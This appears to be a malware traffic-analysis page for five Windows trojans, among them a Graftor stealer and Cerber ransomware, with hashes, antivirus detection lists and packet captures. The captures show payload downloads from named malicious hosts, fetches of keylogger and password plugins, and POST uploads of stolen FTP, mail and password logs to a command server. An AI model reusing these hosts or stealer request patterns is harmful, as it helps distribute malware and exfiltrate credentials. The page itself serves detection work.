Graftor Malware Trojan zanab.exe POST /poon/post.php www.gongotree.com Traffic Sample PCAP file Download

SHA256: 8fd5bcadd9ae6b1875024f1d5ca24a579727905f440600631ec972712f28c3f5
File name: zanab.exe
Detection ratio: 41 / 55
Analysis date: 2017-01-24 02:48:20 UTC
ALYac Gen:Variant.Graftor.318298 20170123
AVG Luhe.Packed.C 20170123
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Graftor.318298 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fsysna.C1743112 20170123
Antiy-AVL Trojan/Win32.Fsysna 20170124
Arcabit Trojan.Graftor.D4DB5A 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) DR/Delphi.bsqgm 20170123
BitDefender Gen:Variant.Graftor.318298 20170124
CAT-QuickHeal (Suspicious) - DNAScan 20170123
Comodo TrojWare.Win32.Spy.Banker.Gen 20170124
CrowdStrike Falcon (ML) malicious_confidence_83% (W) 20161024
Cyren W32/SysVenFak.A.gen!Eldorado 20170124
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJNW 20170124
Emsisoft Gen:Variant.Graftor.318298 (B) 20170124
F-Prot W32/SysVenFak.A.gen!Eldorado 20170124

2017-01-23 21:08:29.692015 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [P.], seq 0:289, ack 1, win 259, length 289: HTTP: GET /utu/zanab.exe HTTP/1.1
E..I.p@….i…f…..J.P.c.;J.?lP…J…GET /utu/zanab.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:48.852699 IP 192.168.1.102.65517 > 75.75.75.75.53: 49466+ A? www.gongotree.com. (35)
E..?i…..x}…fKKKK…5.+:..:………..www    gongotree.com…..
2017-01-23 21:08:49.262241 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [S], seq 318064516, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….>…f…..K.P..G……. .c%…………..
2017-01-23 21:08:49.430597 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [.], ack 1051249154, win 259, length 0
E..(..@….I…f…..K.P..G.>…P….:……..
2017-01-23 21:08:49.431268 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 0:213, ack 1, win 259, length 213: HTTP: GET /poon/plugins/keylogger.p HTTP/1.1
E…..@….s…f…..K.P..G.>…P…….GET /poon/plugins/keylogger.p HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.gongotree.com
Connection: Keep-Alive

2017-01-23 21:08:53.294595 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 213:298, ack 32961, win 254, length 85: HTTP: GET /poon/plugins/ftp.p HTTP/1.1
E..}..@……..f…..K.P..HZ>.J.P….)..GET /poon/plugins/ftp.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:08:57.412231 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 0:371, ack 1, win 259, length 371: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]…(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="FTP-BCC017C5.txt"
Content-type: file

--Xu02=$--
2017-01-23 21:08:58.096953 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 394, win 257, length 0
E..(..@….#…f…..L.P]..T(…P….X……..
2017-01-23 21:09:01.107016 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 298:384, ack 49537, win 259, length 86: HTTP: GET /poon/plugins/mail.p HTTP/1.1
E..~..@……..f…..K.P..H.>…P….K..GET /poon/plugins/mail.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:05.220043 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 371:743, ack 394, win 257, length 372: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E…..@……..f…..L.P]..T(…P…….POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 122
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="MAIL-BCC017C5.TxT"
Content-type: file

--Xu02=$--
2017-01-23 21:09:05.801224 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 787, win 256, length 0
E..(..@……..f…..L.P]…(..”P….\……..
2017-01-23 21:09:06.944920 IP 192.168.1.102.49725 > 75.75.75.75.53: 57531+ A? www.googleapis.com. (36)
E..@i…..xz…fKKKK.=.5.,.P………….www
googleapis.com…..
2017-01-23 21:09:08.751880 IP 192.168.1.102.50507 > 46.173.219.26.80: Flags [P.], seq 384:475, ack 106657, win 259, length 91: HTTP: GET /poon/plugins/passwords.p HTTP/1.1
E…..@……..f…..K.P..I.>.j.P…:^..GET /poon/plugins/passwords.p HTTP/1.1
User-Agent: vb wininet
Host: www.gongotree.com

2017-01-23 21:09:14.342485 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 743:1113, ack 787, win 256, length 370: HTTP: POST /poon/post.php?pl=&slots=1 HTTP/1.1
E….:@….N…f…..L.P]…(..”P…0r..POST /poon/post.php?pl=&slots=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=Xu02=$
Content-Length: 120
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.gongotree.com
Connection: Keep-Alive

--Xu02=$
Content-Disposition: form-data; name="upload1"; filename="PW-BCC017C5.LOG"
Content-type: file

--Xu02=$--
2017-01-23 21:09:16.475901 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [.], ack 1180, win 254, length 0
E..(.;@……..f…..L.P]..:(…P….c……..
2017-01-23 21:09:20.641990 IP 192.168.1.102.59592 > 75.75.75.75.53: 8551+ A? oem.twimg.com. (31)
E..;i…..x{…fKKKK…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:20.641998 IP 192.168.1.102.64219 > 75.75.75.75.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..Ji…..xk…fKKKK…5.6x..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659012 IP 192.168.1.102.64219 > 75.75.76.76.53: 4920+ A? cdn.content.prod.cms.msn.com. (46)
E..JS……….fKKLL…5.6w..8………..cdn.content.prod.cms.msn.com…..
2017-01-23 21:09:20.659020 IP 192.168.1.102.59592 > 75.75.76.76.53: 8551+ A? oem.twimg.com. (31)
E..;S……….fKKLL…5.’..!g………..oem.twimg.com…..
2017-01-23 21:09:23.439161 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [.], ack 870606, win 1349, length 0
E..(.<@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:23.770262 IP 192.168.1.102.50506 > 46.173.219.26.80: Flags [F.], seq 289, ack 870606, win 1349, length 0
E..(.=@……..f…..J.P.c.\J..9P..E……….
2017-01-23 21:09:36.598111 IP 192.168.1.102.50508 > 46.173.219.26.80: Flags [P.], seq 1113:1263, ack 1180, win 254, length 150: HTTP: GET /poon/ HTTP/1.1
E….>@….&…f…..L.P]..:(…P…e_..GET /poon/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
Accept: */*
Host: www.gongotree.com
Connection: Keep-Alive

sub.exe totalwellbeing.com.au Cerber Ransomware Trojan Malware PCAP file download traffic sample

SHA256: 849aa2e275d84c05213f95f764331df0dd743b17b32f61174ac45946544f67eb
File name: sub.exe
Detection ratio: 16 / 55
Analysis date: 2017-01-24 02:42:52 UTC
Avast Win32:Malware-gen 20170124
Avira (no cloud) TR/Crypt.Xpack.gsrsm 20170123
CrowdStrike Falcon (ML) malicious_confidence_76% (W) 20161024
DrWeb Trojan.Encoder.5994 20170124
ESET-NOD32 NSIS/Injector.SH 20170124
GData Win32.Trojan.Agent.XY7YM7 20170124
Invincea ransom.win32.critroni.b 20170111
Kaspersky Trojan-Ransom.Win32.Zerber.bghv 20170124
Malwarebytes Ransom.Cerber 20170124
McAfee Artemis!130678330541 20170124
McAfee-GW-Edition BehavesLike.Win32.ObfusRansom.fc 20170124
Rising Trojan.Injector!8.C4-pKe2N6RHzqF (cloud) 20170124
Sophos Mal/Generic-S 20170124
Symantec ML.Attribute.VeryHighConfidence [Heur.AdvML.B] 20170123

2017-01-23 20:55:04.860000 IP 192.168.1.102.50480 > 162.214.17.204.80: Flags [P.], seq 0:314, ack 1, win 256, length 314: HTTP: GET /wp-includes/images/wlw/sub.exe HTTP/1.1
E..b5.@…L….f…..0.P.M.`\.j\P….|..GET /wp-includes/images/wlw/sub.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: totalwellbeing.com.au
Connection: Keep-Alive

2017-01-23 20:55:18.692931 IP 192.168.1.102.57682 > 90.2.1.0.6892: UDP, length 25
E..5………..fZ….R…!.,df9e07b4fa6400684501000dd
2017-01-23 20:55:18.692999 IP 192.168.1.102.57682 > 90.2.1.1.6892: UDP, length 25
E..5D……….fZ….R…!.+df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693053 IP 192.168.1.102.57682 > 90.2.1.2.6892: UDP, length 25
E..5-F….._…fZ….R…!.*df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693059 IP 192.168.1.102.57682 > 90.2.1.3.6892: UDP, length 25
E..5c……….fZ….R…!.)df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693141 IP 192.168.1.102.57682 > 90.2.1.4.6892: UDP, length 25
E..5Y:…..i…fZ….R…!.(df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693198 IP 192.168.1.102.57682 > 90.2.1.5.6892: UDP, length 25
E..5………..fZ….R…!.’df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693250 IP 192.168.1.102.57682 > 90.2.1.6.6892: UDP, length 25
E..5.p…..1…fZ….R…!.&df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693255 IP 192.168.1.102.57682 > 90.2.1.7.6892: UDP, length 25
E..51……….fZ….R…!.%df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693336 IP 192.168.1.102.57682 > 90.2.1.8.6892: UDP, length 25
E..5c7…..h…fZ….R…!.$df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693383 IP 192.168.1.102.57682 > 90.2.1.9.6892: UDP, length 25
E..5-……….fZ..     .R…!.#df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693442 IP 192.168.1.102.57682 > 90.2.1.10.6892: UDP, length 25
E..5E}….. …fZ..
.R…!.”df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693492 IP 192.168.1.102.57682 > 90.2.1.11.6892: UDP, length 25
E..5………..fZ….R…!.!df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693493 IP 192.168.1.102.57682 > 90.2.1.12.6892: UDP, length 25
E..51……….fZ….R…!. df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693581 IP 192.168.1.102.57682 > 90.2.1.13.6892: UDP, length 25
E..5………..fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693631 IP 192.168.1.102.57682 > 90.2.1.14.6892: UDP, length 25
E..5.k…../…fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693633 IP 192.168.1.102.57682 > 90.2.1.15.6892: UDP, length 25
E..5Y……….fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693715 IP 192.168.1.102.57682 > 90.2.1.16.6892: UDP, length 25
E..5@3…..d…fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693774 IP 192.168.1.102.57682 > 90.2.1.17.6892: UDP, length 25
E..5p……….fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693776 IP 192.168.1.102.57682 > 90.2.1.18.6892: UDP, length 25
E..5………..fZ….R…!..df9e07b4fa6400684501000dd
2017-01-23 20:55:18.693843 IP 192.168.1.102.57682 > 90.2.1.19.6892: UDP, length 25
E..5X……{…fZ….R…!..df9e07b4fa6400684501000dd

2017-01-23 20:55:19.683716 IP 192.168.1.102.57682 > 91.239.25.242.6892: UDP, length 25
E..5R……….f[….R…!oMdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683720 IP 192.168.1.102.57682 > 91.239.25.243.6892: UDP, length 25
E..5…….:…f[….R…!oLdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683799 IP 192.168.1.102.57682 > 91.239.25.244.6892: UDP, length 25
E..5>……….f[….R…!oKdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683849 IP 192.168.1.102.57682 > 91.239.25.245.6892: UDP, length 25
E..5…….(…f[….R…!oJdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683901 IP 192.168.1.102.57682 > 91.239.25.246.6892: UDP, length 25
E..5%……….f[….R…!oIdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683905 IP 192.168.1.102.57682 > 91.239.25.247.6892: UDP, length 25
E..5fk…..X…f[….R…!oHdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.683957 IP 192.168.1.102.57682 > 91.239.25.248.6892: UDP, length 25
E..5………..f[….R…!oGdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684030 IP 192.168.1.102.57682 > 91.239.25.249.6892: UDP, length 25
E..5S……….f[….R…!oFdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684085 IP 192.168.1.102.57682 > 91.239.25.250.6892: UDP, length 25
E..5;……….f[….R…!oEdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684090 IP 192.168.1.102.57682 > 91.239.25.251.6892: UDP, length 25
E..5ph…..W…f[….R…!oDdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684136 IP 192.168.1.102.57682 > 91.239.25.252.6892: UDP, length 25
E..5g……….f[….R…!oCdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684196 IP 192.168.1.102.57682 > 91.239.25.253.6892: UDP, length 25
E..5$\…..a…f[….R…!oBdf9e07b4fa6400684501000dd
2017-01-23 20:55:19.684259 IP 192.168.1.102.57682 > 91.239.25.254.6892: UDP, length 25
E..5.8………f[….R…!oAdf9e07b4fa6400684501000dd
2017-01-23 20:55:20.688939 IP 192.168.1.102.57682 > 91.239.25.255.6892: UDP, length 25
E..5?……9…f[….R…!o@df9e07b4fa6400684501000dd

Jadtre Unknown Malware Trojan Traffic Analysis PCAP file download sample mbfce24rgn65bx3g.er29sl.com

SHA256: 065fdaa90c06c60f77fcae1420b1612eb266e55bbd417f60cedd33014be30529
File name: read.php?f=0.dat
Detection ratio: 5 / 55
Analysis date: 2017-01-24 02:35:57 UTC

Baidu Win32.Trojan.WisdomEyes.16070401.9500.9995 20170123
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/GenKryptik.RZM 20170124
Fortinet W32/Kryptik.FNGP!tr 20170124
Invincea virus.win32.jadtre.b 20170111

2017-01-23 20:52:10.544193 IP 192.168.1.102.50465 > 54.165.109.229.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..Lj.@…(….f6.m..!.P….k   ~.P…….GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: smoeroota.top
Connection: Keep-Alive

2017-01-23 20:52:40.577524 IP 192.168.1.102.63681 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y     …fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:42.546840 IP 192.168.1.102.63682 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:42.577669 IP 192.168.1.102.63681 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:43.189174 IP 192.168.1.102.58262 > 75.75.75.75.53: 3995+ A? mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net. (67)
E.._h…..x….fKKKK…5.K……………mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net…..
2017-01-23 20:52:43.219805 IP 192.168.1.102.58262 > 75.75.76.76.53: 3995+ A? mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net. (67)
E.._Rh………fKKLL…5.K……………mbfce24rgn65bx3g.rzunt3u2.com.hsd1.md.comcast.net…..
2017-01-23 20:52:43.262040 IP 192.168.1.102.58263 > 75.75.75.75.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.261950 IP 192.168.1.102.58264 > 75.75.75.75.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.286235 IP 192.168.1.102.58265 > 75.75.75.75.53: 56789+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7.m………….mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:44.558174 IP 192.168.1.102.63682 > 75.75.75.75.53: 49466+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..y….fKKKK…5.7…:………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.277355 IP 192.168.1.102.58263 > 75.75.76.76.53: 60265+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..KRm………fKKLL…5.7…i………..mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.277609 IP 192.168.1.102.58266 > 75.75.75.75.53: 56789+ A? mbfce24rgn65bx3g.rzunt3u2.com. (47)
E..Kh…..x….fKKKK…5.7.l………….mbfce24rgn65bx3g.rzunt3u2.com…..
2017-01-23 20:52:45.413254 IP 192.168.1.102.58267 > 75.75.75.75.53: 65171+ A? mbfce24rgn65bx3g.er29sl.com. (45)
E..Ih…..y….fKKKK…5.5E…………..mbfce24rgn65bx3g.er29sl.com…..
2017-01-23 20:52:45.719634 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [S], seq 1019927426, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4qg@……..f6….$.P<……… ……………..
2017-01-23 20:52:45.754349 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [.], ack 853700286, win 256, length 0
E..(qh@……..f6….$.P<…2.n.P………….
2017-01-23 20:52:45.756985 IP 192.168.1.102.50468 > 54.175.146.166.80: Flags [P.], seq 0:94, ack 1, win 256, length 94: HTTP: POST / HTTP/1.1
E…qi@……..f6….$.P<…2.n.P…l|..POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.com
Content-Length: 167
Connection: close

DICVFL.exe Trojan Downloader Malware Traffic Analysis Sample PCAP file download

SHA256: 2933b492fec30500750c3d5f598bf99fdf976e15dbc8895393b94a91233bd7fc
File name: DICVFL.exe
Detection ratio: 25 / 55
Analysis date: 2017-01-24 02:29:56 UTC
Ad-Aware Trojan.GenericKD.4218289 20170124
AegisLab Ml.Attribute.Veryhighconfidence.[Heur.Advml!c 20170123
AhnLab-V3 Trojan/Win32.Autoit.C1702709 20170123
Arcabit Trojan.Generic.D405DB1 20170124
Avast Other:Malware-gen [Trj] 20170124
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9784 20170123
BitDefender Trojan.GenericKD.4218289 20170124
CMC Trojan.Win32.Generic!O 20170123
CrowdStrike Falcon (ML) malicious_confidence_75% (W) 20161024
DrWeb Trojan.DownLoader23.48840 20170124
Emsisoft Trojan.GenericKD.4218289 (B) 20170124
F-Secure Trojan.GenericKD.4218289 20170124
GData Trojan.GenericKD.4218289 20170124
Ikarus Trojan.Inject 20170123
Invincea worm.win32.moarider.a 20170111
K7AntiVirus Trojan ( 004b8bad1 ) 20170123
K7GW Trojan ( 004b8bad1 ) 20170124
Kaspersky Trojan-PSW.Win32.Autoit.et 20170124
Malwarebytes Backdoor.Bot 20170124
eScan Trojan.GenericKD.4218289 20170124

2017-01-23 20:49:50.377649 IP 192.168.1.102.50454 > 216.158.236.123.80: Flags [P.], seq 0:299, ack 1, win 256, length 299: HTTP: GET /888/micro/DICVFL.exe HTTP/1.1
E..S=.@…4….f…{…PuC3..9Z.P….$..GET /888/micro/DICVFL.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: lascofittings.cf
Connection: Keep-Alive

2017-01-23 20:49:58.172216 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,.@……..f..:….”..$O…… ……………..
2017-01-23 20:49:58.668336 IP 192.168.1.102.50454 > 216.158.236.123.80: Flags [F.], seq 299, ack 482841, win 891, length 0
E..(>H@…5_…f…{…PuC5
.@..P..{
|……..
2017-01-23 20:50:01.183928 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4, @……..f..:….”..$O…… ……………..
2017-01-23 20:50:07.198638 IP 192.168.1.102.50455 > 213.183.58.12.2082: Flags [S], seq 3473220687, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0,!@……..f..:….”..$O….p……………
2017-01-23 20:50:13.670429 IP 192.168.1.102.50445 > 104.146.164.25.443: Flags [F.], seq 1554793646, ack 1155943388, win 256, length 0
E..(5.@….R…fh…….\.D.D.K.P….3……..
2017-01-23 20:50:13.670663 IP 192.168.1.102.50442 > 104.146.164.25.443: Flags [F.], seq 814848555, ack 2286363549, win 256, length 0
E..(5.@….Q…fh….
..0..+.G#.P………….
2017-01-23 20:50:13.670780 IP 192.168.1.102.50446 > 104.146.164.25.443: Flags [F.], seq 883426129, ack 374204385, win 256, length 0
E..(5.@….P…fh…….4..Q.M..P….’……..
2017-01-23 20:50:13.670955 IP 192.168.1.102.50439 > 104.146.164.25.443: Flags [F.], seq 1363039211, ack 2644039456, win 256, length 0
E..(5.@….O…fh…….Q>S…. P….s……..
2017-01-23 20:50:13.964345 IP 192.168.1.102.50439 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….N…fh…….Q>S….!P….r……..
2017-01-23 20:50:13.965415 IP 192.168.1.102.50446 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….M…fh…….4..R.M..P….&……..
2017-01-23 20:50:13.966452 IP 192.168.1.102.50445 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….L…fh…….\.D.D.K.P….2……..
2017-01-23 20:50:13.970768 IP 192.168.1.102.50442 > 104.146.164.25.443: Flags [.], ack 2, win 256, length 0
E..(5.@….K…fh….
..0..,.G#.P………….
2017-01-23 20:50:19.120859 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,”@……..f..:….”.N…….. ……………..
2017-01-23 20:50:22.135768 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4,#@……..f..:….”.N…….. ……………..
2017-01-23 20:50:28.137285 IP 192.168.1.102.50460 > 213.183.58.12.2082: Flags [S], seq 3964598830, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0,$@……..f..:….”.N……p……………

Symmi Slingup Dapato Malware Trojan Traffic Analysis PCAP file download sample

SHA256: 965756c5a1d67fca84a92b49fa346627a72327ebee621fd4f81f3296ddc39c74
File name: beta.exe
Detection ratio: 43 / 55
Analysis date: 2017-01-24 02:26:16 UTC
AVware Trojan.Win32.Generic!BT 20170124
Ad-Aware Gen:Variant.Symmi.69617 20170124
AegisLab W32.W.Otwycal.l6ei 20170123
AhnLab-V3 Trojan/Win32.Fareit.R193567 20170123
Antiy-AVL Trojan[Dropper]/Win32.Dapato 20170124
Arcabit Trojan.Symmi.D10FF1 20170124
Avast Win32:Malware-gen 20170124
Avira (no cloud) BDS/Slingup.aptxz 20170123
BitDefender Gen:Variant.Symmi.69617 20170124
CAT-QuickHeal Backdoor.Slingup 20170123
Comodo TrojWare.Win32.UMal.zhzcf 20170124
CrowdStrike Falcon (ML) malicious_confidence_80% (W) 20161024
DrWeb Trojan.DownLoader14.15241 20170124
ESET-NOD32 a variant of Win32/Injector.DJPB 20170124
Emsisoft Gen:Variant.Symmi.69617 (B) 20170124
F-Secure Gen:Variant.Symmi.69617 20170124
Fortinet W32/Injector.DJPB!tr 20170124

2017-01-23 21:10:34.244238 IP 192.168.1.102.50519 > 46.173.219.26.80: Flags [P.], seq 0:288, ack 1, win 259, length 288: HTTP: GET /utu/beta.exe HTTP/1.1
E..H.D@……..f…..W.P.X.9…,P…….GET /utu/beta.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: gongotree.com
Connection: Keep-Alive

2017-01-23 21:18:52.669213 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [S], seq 2576574364, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4k.@……..f.:……..g……. ……………..
2017-01-23 21:18:52.705913 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 4012597881, win 256, length 0
E..(k.@……..f.:……..g..+byP………….
2017-01-23 21:18:52.707025 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 0:77, ack 1, win 256, length 77
E..uk.@….g…f.:……..g..+byP………..H…D..X..H….8.l.V…DQ#m.        .0Q…#.,………
.       .d.b………c………
2017-01-23 21:18:52.730755 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 2861, win 256, length 0
E..(k.@……..f.:……..g..+m.P………….
2017-01-23 21:18:52.732053 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 77:395, ack 4048, win 252, length 318
E..fk.@….t…f.:……..g..+rHP….n………….p…….Q…=..=.|…G.k0.i6……W^^1..s..q..uqv..@B…..1&.U…-…o$X…….q…….H.^…C~….-…      …..<…..A.a…i.*.e#rm …..-&W…f..b..{.. .J..
T…BR..B_.Crl…..Aa^_.Rs.?`#.m…>.<…”….G.Kr.^ ……H$.(.. .|8X..t..K…E….}…c.u.m…..^H:……….(.i….%…..Zi…….8…….
…c’….’
2017-01-23 21:18:52.817679 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [.], ack 4099, win 252, length 0
E..(k.@……..f.:……..i(.+r{P….|……..
2017-01-23 21:18:52.915817 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 395:1101, ack 4099, win 252, length 706
E…k.@……..f.:……..i(.+r{P………………….f3……….k……B..{. ……b….,…7jM.q……x..A…….uc..:>..qt*.tx.F……..B..=._.#P…..Q…u.@O..&……sCLN….V…….].6CKM….&..:…..y-…..l……{>&..M.8…x.P.V..C..z..H…v….iW.S….6.U.%<……-….z….}.’)*y…….w……;P.u……G.#V…;..;…..9z.o….X…….6u.K…’………….”Bl……a……….&…6.y.Z=D_.=.!……GC*Pg..p.[…^*._i._vj.09}H… ]..>……..70L.1G…..O.>,..”.8a”..u…..6..<e.K..{W)…B………x@.z.|.`..2f\,…..G@r….?..4.W.~.2.]..Js.2m..b”.k3″…C….h|..i..I.s.A.tu-./..$.j.X.[.c?..;j..5..o…XO…%7.e..Df…..2…..A……….;….=.;C..c9A.. d}.v.+….D+f………..dt….f.v`.!=.[S..lH…..m.J..P.4..(p..V.H..e…..4.f.Y….
2017-01-23 21:18:52.916417 IP 192.168.1.102.50694 > 216.58.218.238.443: Flags [P.], seq 1101:2561, ack 4099, win 252, length 1460
